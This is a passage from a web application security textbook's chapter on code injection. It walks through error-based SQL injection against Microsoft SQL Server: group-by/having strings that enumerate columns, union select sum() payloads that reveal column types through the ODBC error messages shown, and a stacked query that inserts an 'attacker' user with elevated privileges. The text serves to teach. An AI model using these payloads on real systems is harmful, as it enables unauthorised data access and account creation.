Chapter 9  ■ Injecting Code

This message discloses the name of the second column being returned by

the query. You can continue inserting the name of each enumerated column

into the attack string, eventually arriving at the following attack string:

‘ group by users.ID, users.username, users.password, users.privs having

1=1--

Submitting this value does not result in any error message. This confirms

that you have now enumerated all of the columns being returned by the query,

and the order in which they appear.

The next step is to determine the data types of each column. Using the infor-

mation already obtained, you can supply the following input:

‘ union select sum(username) from users--

This input attempts to perform a second query and combine the results with

those of the original. It generates the following error message:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average 

aggregate operation cannot take a varchar data type as an argument.

This error occurs because the database carried out the injected query before

attempting to combine the results with those of the original. The 

SUM

function

performs a numeric sum, and takes numeric type data as its input. Because the

username column is a string type, this causes an error, and the message dis-

closes that the username column is of the specific data type 

varchar

. 

Submitting the same input with the 

ID

column produces a different error

message:

‘ union select sum(ID) from users--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL 

statement containing a UNION operator must have an equal number of 

expressions in their target lists.

This error indicates that the 

SUM

function was successful, and a problem

arose at the point where the database attempted to combine the single column

returned by the injected query with the four columns returned by the original

query. This effectively confirms that the 

ID

column is a numeric data type.

You can repeat this test on each of the fields of the query to confirm their

data types. Having done this, you now have sufficient information to extract

arbitrary information from the 

users

table, and to insert your own data into it.

For example, to add a new user account with arbitrary 

ID

and 

privs

values,

you can submit the following as either of the vulnerable fields:

‘; insert into users values( 666, ‘attacker’, ‘foobar’, 0xffff )--

Download 5,76 Mb.

Do'stlaringiz bilan baham: